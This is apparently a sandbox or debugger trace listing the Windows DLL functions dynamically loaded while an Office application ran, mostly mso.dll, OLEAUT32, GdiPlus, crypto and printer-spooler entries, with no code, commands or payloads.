DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: apphelp.dll/ApphelpCheckShellObject
DynamicLoader: mso.dll/
DynamicLoader: SXS.DLL/SxsOleAut32MapReferenceClsidToConfiguredClsid
DynamicLoader: mso.dll/
DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: VBE7.DLL/DllVbeInit
DynamicLoader: mso.dll/_MsoInitGimme@12
DynamicLoader: mso.dll/_MsoFGimmeFeatureEx@8
DynamicLoader: mso.dll/_MsoFGimmeComponentEx@24
DynamicLoader: mso.dll/_MsoFGimmeComponentEx@20
DynamicLoader: mso.dll/_MsoFGimmeFileEx@24
DynamicLoader: mso.dll/_MsoFGimmeFileEx@20
DynamicLoader: mso.dll/_MsoSetLVProperty@8
DynamicLoader: mso.dll/_MsoVBADigSigCallDlg@20
DynamicLoader: mso.dll/_MsoVbaInitSecurity@4
DynamicLoader: mso.dll/_MsoFIEPolicyAndVersion@8
DynamicLoader: mso.dll/_MsoFUseIEFeature@8
DynamicLoader: mso.dll/_MsoFAnsiCodePageSupportsLCID@8
DynamicLoader: mso.dll/_MsoFInitOffice@20
DynamicLoader: mso.dll/_MsoUninitOffice@4
DynamicLoader: mso.dll/_MsoFGetFontSettings@20
DynamicLoader: mso.dll/_MsoRgchToRgwch@16
DynamicLoader: mso.dll/_MsoHrSimpleQueryInterface@16
DynamicLoader: mso.dll/_MsoHrSimpleQueryInterface2@20
DynamicLoader: mso.dll/_MsoFCreateControl@36
DynamicLoader: mso.dll/_MsoFLongLoad@8
DynamicLoader: mso.dll/_MsoFLongSave@8
DynamicLoader: mso.dll/_MsoFGetTooltips@0
DynamicLoader: mso.dll/_MsoFSetTooltips@4
DynamicLoader: mso.dll/_MsoFLoadToolbarSet@24
DynamicLoader: mso.dll/_MsoFCreateToolbarSet@28
DynamicLoader: mso.dll/_MsoInitShrGlobal@4
DynamicLoader: mso.dll/_MsoHpalOffice@0
DynamicLoader: mso.dll/_MsoFWndProcNeeded@4
DynamicLoader: mso.dll/_MsoFWndProc@24
DynamicLoader: mso.dll/_MsoFCreateITFCHwnd@20
DynamicLoader: mso.dll/_MsoDestroyITFC@4
DynamicLoader: mso.dll/_MsoFPitbsFromHwndAndMsg@12
DynamicLoader: mso.dll/_MsoFGetComponentManager@4
DynamicLoader: mso.dll/_MsoMultiByteToWideChar@24
DynamicLoader: mso.dll/_MsoWideCharToMultiByte@32
DynamicLoader: mso.dll/_MsoHrRegisterAll@0
DynamicLoader: mso.dll/_MsoFSetComponentManager@4
DynamicLoader: mso.dll/_MsoFCreateStdComponentManager@20
DynamicLoader: mso.dll/_MsoFHandledMessageNeeded@4
DynamicLoader: mso.dll/_MsoPeekMessage@8
DynamicLoader: mso.dll/_MsoGetWWWCmdInfo@20
DynamicLoader: mso.dll/_MsoFExecWWWHelp@8
DynamicLoader: mso.dll/_MsoFCreateIPref@28
DynamicLoader: mso.dll/_MsoDestroyIPref@4
DynamicLoader: mso.dll/_MsoChsFromLid@4
DynamicLoader: mso.dll/_MsoCpgFromChs@4
DynamicLoader: mso.dll/_MsoSetLocale@4
DynamicLoader: mso.dll/_MsoFSetHMsoinstOfSdm@4
DynamicLoader: mso.dll/_MsoVBADigSig2CallDlgEx@28
DynamicLoader: mso.dll/_MsoVbaInitSecurityEx@4
DynamicLoader: OLEAUT32.dll/SysFreeString
DynamicLoader: OLEAUT32.dll/LoadTypeLib
DynamicLoader: OLEAUT32.dll/RegisterTypeLib
DynamicLoader: OLEAUT32.dll/QueryPathOfRegTypeLib
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/OleTranslateColor
DynamicLoader: OLEAUT32.dll/OleCreateFontIndirect
DynamicLoader: OLEAUT32.dll/OleCreatePictureIndirect
DynamicLoader: OLEAUT32.dll/OleLoadPicture
DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrameIndirect
DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrame
DynamicLoader: OLEAUT32.dll/OleIconToCursor
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/OleLoadPictureEx
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/MonitorFromWindow
DynamicLoader: USER32.dll/MonitorFromRect
DynamicLoader: USER32.dll/MonitorFromPoint
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: OLEAUT32.dll/DispCallFunc
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/CreateTypeLib2
DynamicLoader: OLEAUT32.dll/VarDateFromUdate
DynamicLoader: OLEAUT32.dll/VarUdateFromDate
DynamicLoader: OLEAUT32.dll/GetAltMonthNames
DynamicLoader: OLEAUT32.dll/VarNumFromParseNum
DynamicLoader: OLEAUT32.dll/VarParseNumFromStr
DynamicLoader: OLEAUT32.dll/VarDecFromR4
DynamicLoader: OLEAUT32.dll/VarDecFromR8
DynamicLoader: OLEAUT32.dll/VarDecFromDate
DynamicLoader: OLEAUT32.dll/VarDecFromI4
DynamicLoader: OLEAUT32.dll/VarDecFromCy
DynamicLoader: OLEAUT32.dll/VarR4FromDec
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromTypeInfo
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromGuids
DynamicLoader: OLEAUT32.dll/SafeArrayGetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArraySetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArrayGetIID
DynamicLoader: OLEAUT32.dll/SafeArraySetIID
DynamicLoader: OLEAUT32.dll/SafeArrayCopyData
DynamicLoader: OLEAUT32.dll/SafeArrayAllocDescriptorEx
DynamicLoader: OLEAUT32.dll/SafeArrayCreateEx
DynamicLoader: OLEAUT32.dll/VarFormat
DynamicLoader: OLEAUT32.dll/VarFormatDateTime
DynamicLoader: OLEAUT32.dll/VarFormatNumber
DynamicLoader: OLEAUT32.dll/VarFormatPercent
DynamicLoader: OLEAUT32.dll/VarFormatCurrency
DynamicLoader: OLEAUT32.dll/VarWeekdayName
DynamicLoader: OLEAUT32.dll/VarMonthName
DynamicLoader: OLEAUT32.dll/VarAdd
DynamicLoader: OLEAUT32.dll/VarAnd
DynamicLoader: OLEAUT32.dll/VarCat
DynamicLoader: OLEAUT32.dll/VarDiv
DynamicLoader: OLEAUT32.dll/VarEqv
DynamicLoader: OLEAUT32.dll/VarIdiv
DynamicLoader: OLEAUT32.dll/VarImp
DynamicLoader: OLEAUT32.dll/VarMod
DynamicLoader: OLEAUT32.dll/VarMul
DynamicLoader: OLEAUT32.dll/VarOr
DynamicLoader: OLEAUT32.dll/VarPow
DynamicLoader: OLEAUT32.dll/VarSub
DynamicLoader: OLEAUT32.dll/VarXor
DynamicLoader: OLEAUT32.dll/VarAbs
DynamicLoader: OLEAUT32.dll/VarFix
DynamicLoader: OLEAUT32.dll/VarInt
DynamicLoader: OLEAUT32.dll/VarNeg
DynamicLoader: OLEAUT32.dll/VarNot
DynamicLoader: OLEAUT32.dll/VarRound
DynamicLoader: OLEAUT32.dll/VarCmp
DynamicLoader: OLEAUT32.dll/VarDecAdd
DynamicLoader: OLEAUT32.dll/VarDecCmp
DynamicLoader: OLEAUT32.dll/VarBstrCat
DynamicLoader: OLEAUT32.dll/VarCyMulI4
DynamicLoader: OLEAUT32.dll/VarBstrCmp
DynamicLoader: ole32.dll/CoCreateInstanceEx
DynamicLoader: ole32.dll/CLSIDFromProgIDEx
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/_MsoMultiByteToWideChar@24
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid
DynamicLoader: mso.dll/_MsoFTranslateCp@16
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/RegisterTypeLibForUser
DynamicLoader: mso.dll/
DynamicLoader: ole32.dll/DllDebugObjectRPCHook
DynamicLoader: Comctl32.dll/ImageList_Destroy
DynamicLoader: Comctl32.dll/ImageList_GetIconSize
DynamicLoader: Comctl32.dll/InitCommonControls
DynamicLoader: Comctl32.dll/ImageList_LoadImageA
DynamicLoader: Comctl32.dll/ImageList_SetOverlayImage
DynamicLoader: Comctl32.dll/ImageList_AddMasked
DynamicLoader: Comctl32.dll/ImageList_GetImageInfo
DynamicLoader: Comctl32.dll/ImageList_Draw
DynamicLoader: Comctl32.dll/ImageList_DrawEx
DynamicLoader: Comctl32.dll/PropertySheetA
DynamicLoader: Comctl32.dll/DestroyPropertySheetPage
DynamicLoader: Comctl32.dll/CreatePropertySheetPageA
DynamicLoader: Comctl32.dll/RegisterClassNameW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GDI32.dll/GdiTransparentBlt
DynamicLoader: GDI32.dll/GdiAlphaBlend
DynamicLoader: GDI32.dll/GdiGradientFill
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreatePath
DynamicLoader: GdiPlus.dll/GdipStartPathFigure
DynamicLoader: GdiPlus.dll/GdipAddPathLine2
DynamicLoader: GdiPlus.dll/GdipClosePathFigure
DynamicLoader: GdiPlus.dll/GdipClonePath
DynamicLoader: GdiPlus.dll/GdipCreateMatrix2
DynamicLoader: GdiPlus.dll/GdipTransformPath
DynamicLoader: GdiPlus.dll/GdipDeleteMatrix
DynamicLoader: GdiPlus.dll/GdipAddPathPolygon
DynamicLoader: GdiPlus.dll/GdipGetPathWorldBounds
DynamicLoader: GdiPlus.dll/GdipCreatePen1
DynamicLoader: GdiPlus.dll/GdipSetPenLineCap197819
DynamicLoader: GdiPlus.dll/GdipSetPenLineJoin
DynamicLoader: GdiPlus.dll/GdipSetPenMiterLimit
DynamicLoader: GdiPlus.dll/GdipCreatePathIter
DynamicLoader: GdiPlus.dll/GdipPathIterRewind
DynamicLoader: GdiPlus.dll/GdipPathIterNextSubpath
DynamicLoader: GdiPlus.dll/GdipPathIterCopyData
DynamicLoader: GdiPlus.dll/GdipDeletePathIter
DynamicLoader: GdiPlus.dll/GdipAddPathLine
DynamicLoader: GdiPlus.dll/GdipClonePen
DynamicLoader: GdiPlus.dll/GdipSetPenStartCap
DynamicLoader: GdiPlus.dll/GdipSetPenEndCap
DynamicLoader: GdiPlus.dll/GdipDeletePen
DynamicLoader: GdiPlus.dll/GdipCreateFromHDC
DynamicLoader: GdiPlus.dll/GdipSetPixelOffsetMode
DynamicLoader: GdiPlus.dll/GdipSetSmoothingMode
DynamicLoader: GdiPlus.dll/GdipSetCompositingQuality
DynamicLoader: GdiPlus.dll/GdipSetPageUnit
DynamicLoader: GdiPlus.dll/GdipSetInterpolationMode
DynamicLoader: GdiPlus.dll/GdipGetSmoothingMode
DynamicLoader: GdiPlus.dll/GdipTransformPoints
DynamicLoader: GdiPlus.dll/GdipCreateBitmapFromGraphics
DynamicLoader: GdiPlus.dll/GdipGetImageGraphicsContext
DynamicLoader: GdiPlus.dll/GdipTranslateWorldTransform
DynamicLoader: GdiPlus.dll/GdipCreateImageAttributes
DynamicLoader: GdiPlus.dll/GdipSetImageAttributesWrapMode
DynamicLoader: GdiPlus.dll/GdipGetImageType
DynamicLoader: GdiPlus.dll/GdipGetImageBounds
DynamicLoader: GdiPlus.dll/GdipDrawImagePointsRect
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: GdiPlus.dll/GdipDisposeImageAttributes
DynamicLoader: GdiPlus.dll/GdipDeleteGraphics
DynamicLoader: GdiPlus.dll/GdipCreateCachedBitmap
DynamicLoader: GdiPlus.dll/GdipDrawCachedBitmap
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: Comctl32.dll/RegisterClassNameW
DynamicLoader: Comctl32.dll/CreateToolbarEx
DynamicLoader: Comctl32.dll/ImageList_DrawEx
DynamicLoader: Comctl32.dll/ImageList_LoadImageA
DynamicLoader: Comctl32.dll/ImageList_Destroy
DynamicLoader: Comctl32.dll/ImageList_SetBkColor
DynamicLoader: Comctl32.dll/CreateMappedBitmap
DynamicLoader: Comctl32.dll/RegisterClassNameW
DynamicLoader: mso.dll/
DynamicLoader: UxTheme.DLL/IsThemeActive
DynamicLoader: ole32.dll/OleInitialize
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/_MsoFDoSmartTagSecurityCheck@8
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: msproof7.dll/DllGetClassObject
DynamicLoader: msproof7.dll/DllCanUnloadNow
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/NotifyServiceStatusChangeW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/NotifyServiceStatusChangeW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: riched20.dll/REMSOHInst
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: USERENV.dll/CreateEnvironmentBlock
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: SspiCli.dll/GetUserNameExW
DynamicLoader: USERENV.dll/DestroyEnvironmentBlock
DynamicLoader: kernel32.dll/GetNamedPipeClientProcessId
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptSetHashParam
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: SHELL32.DLL/SHFileOperationW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: kernel32.dll/GetNamedPipeClientProcessId
DynamicLoader: Comctl32.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/GetNamedPipeClientProcessId
DynamicLoader: kernel32.dll/GetNamedPipeClientProcessId
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: MSGR3EN.DLL/CheckVersion
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: USP10.DLL/ScriptFreeCache
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: VBE7.DLL/DllVbeTerm
DynamicLoader: VBE7.DLL/DllCanUnloadNow
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: USER32.dll/UnregisterPowerSettingNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: mso.dll/
DynamicLoader: DwmApi.DLL/DwmIsCompositionEnabled
DynamicLoader: DwmApi.DLL/DwmGetColorizationColor
DynamicLoader: kernel32.dll/GetProductInfo
DynamicLoader: kernel32.dll/GetUserGeoID
DynamicLoader: msi.dll/DllGetVersion
DynamicLoader: GdiPlus.dll/GdipDeleteCachedBitmap
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/SetDefaultPrinterW
DynamicLoader: WINSPOOL.DRV/GetDefaultPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverPackagePathW
DynamicLoader: WINSPOOL.DRV/CorePrinterDriverInstalledW
DynamicLoader: WINSPOOL.DRV/GetCorePrinterDriversW
DynamicLoader: WINSPOOL.DRV/UploadPrinterDriverPackageW
DynamicLoader: WINSPOOL.DRV/InstallPrinterDriverFromPackageW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/AddPrinterConnection2W
DynamicLoader: WINSPOOL.DRV/OpenPrinter2W
DynamicLoader: WINSPOOL.DRV/DeletePrinterKeyW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDataExW
DynamicLoader: WINSPOOL.DRV/EnumPrinterKeyW
